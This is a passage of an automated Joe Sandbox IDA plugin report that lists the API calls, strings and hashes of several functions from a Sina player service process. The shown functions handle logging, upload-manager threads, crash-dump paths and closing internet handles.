                                                                                                                                                                                                    Function 003772B0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 184threadwindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0Thread@base@@QAE@PBD@Z.BASE(UploadMgrThread,8285FFAB), ref: 003772EE
                                                                                                                                                                                                    • ?current@MessageLoopProxy@base@@SA?AV?$scoped_refptr@VMessageLoopProxy@base@@@@XZ.BASE(00000038), ref: 00377305
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 0037731B
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 00377324
                                                                                                                                                                                                      • Part of subcall function 00377210: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,00000000,6C6C26A0,0000009C,00000000,00399564,000000FF), ref: 00377258
                                                                                                                                                                                                      • Part of subcall function 00377210: ?clear@FilePath@base@@QAEXXZ.BASE(?), ref: 0037728D
                                                                                                                                                                                                      • Part of subcall function 0037D390: ??2@YAPAXI@Z.MSVCR120(00000018,003773CB), ref: 0037D392
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00377487
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(00000000,00000000), ref: 003774A7
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003774E1
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00377518
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00377535
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00377552
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00377575
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00377586
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 003775A0
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003775BE
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003775CD
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037761B
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00377627
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00377630
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@FilePath@base@@$?sputc@?$basic_streambuf@LoopMessageU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??2@??3@?clear@?current@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputProxy@base@@Proxy@base@@@@StringThreadThread@base@@TickV01@@V?$scoped_refptr@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $UploadMgr$UploadMgrThread$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3381690184-3722211712
                                                                                                                                                                                                    • Opcode ID: 281b64498f1f2a615557c82faa187d7d4382642fe558714890cc154e2bf240cc
                                                                                                                                                                                                    • Instruction ID: 7a652424bad34159c10c6609a278a2aeb3df2b8f76b222b7c3d18518802e44b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 281b64498f1f2a615557c82faa187d7d4382642fe558714890cc154e2bf240cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F9192B1A00249EFEB16DF64D919BDDFBB4FF00308F008699D419AB281DBB96558CF91
                                                                                                                                                                                                    Function 0037FB30 Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 167COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 0037FB71
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003,?), ref: 0037FB9F
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EF,?), ref: 0037FBB8
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FBEE
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FC02
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FC14
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003E9,?), ref: 0037FC31
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FC67
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FC7B
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FC87
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 0037FCA2
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003E9,?), ref: 0037FCB4
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FCEA
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FCFE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FD10
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathV01@V01@@$Get@Path@base@@@Service@@$Append@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Path@1@@$CreateDirectoryExists@base@@W@base@@
                                                                                                                                                                                                    • String ID: $ClientCrashDumps$logs$player_debug.log
                                                                                                                                                                                                    • API String ID: 3723936409-3398229142
                                                                                                                                                                                                    • Opcode ID: 7e060abc22820f1923b85b6e805f65e6c1e6e76c80f419c137377be45267e632
                                                                                                                                                                                                    • Instruction ID: 35a01f5ccc57e491cab4d7a9c58e3d63feecf8bb5748e20d219a53db27a7759e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e060abc22820f1923b85b6e805f65e6c1e6e76c80f419c137377be45267e632
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6861AC31800218DFDB56EB94DC49BDDBB7CAF1A318F14019AE809B3291DB756B8CCB61
                                                                                                                                                                                                    Function 003729A0 Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 165networkthreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 003729ED
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00372A10
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00372A4A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00372A84
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00372AA4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AC1
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00372AE4
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AF5
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372B05
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00372B10
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00372B2E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00372B3D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372BA0
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372BAC
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00372BB5
                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00372BC9
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000001), ref: 00372BDA
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000001), ref: 00372BEA
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00372BFD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$CloseHandleInternet$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickUnlock@?$basic_streambuf@V01@@V?$basic_ostream@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $ApnsHTTP.cpp$Close
                                                                                                                                                                                                    • API String ID: 1298611805-2357959525
                                                                                                                                                                                                    • Opcode ID: 34ebe9f7d9f1f3ab78c2593c04f093e4b4ff99b24c341d8f3cb29ff3e36d04b5
                                                                                                                                                                                                    • Instruction ID: 65cf2e00221dfb79a5ecdc08eb89339c10aec72640a223654a8eb6c306dd922e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34ebe9f7d9f1f3ab78c2593c04f093e4b4ff99b24c341d8f3cb29ff3e36d04b5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1714175900209DFDB22DFA4DD4AB9EBBF8FF14304F008999E40AA7291DB75A944CF61
                                                                                                                                                                                                    Function 0037C890 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 229threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,00000000), ref: 0037C8E1
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C904
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C93E
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C978
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037C995
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C9B2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037C9D5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037C9E6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA00
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA1E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA2D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CA7E
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CA8A
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CA93
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000008), ref: 0037CB30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@$??3@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $UploadMgr::UIQuit$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1631858441-2300907735
                                                                                                                                                                                                    • Opcode ID: 016fd62313670d7396b5adc81f2cbe3b83f842b94f53ca763c51fc093871a501
                                                                                                                                                                                                    • Instruction ID: 3f1c55c47042288e555f5208aff84a1fe742509ab14dd432dd073722370af06a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 016fd62313670d7396b5adc81f2cbe3b83f842b94f53ca763c51fc093871a501
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A18F71A002189FDB22DF68D889B9DBBF4FB04344F05C5A9E80EAB291D774AD48CF51
                                                                                                                                                                                                    Function 00372410 Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 150threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00372467
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00372487
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003724C1
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003724F8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00372515
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
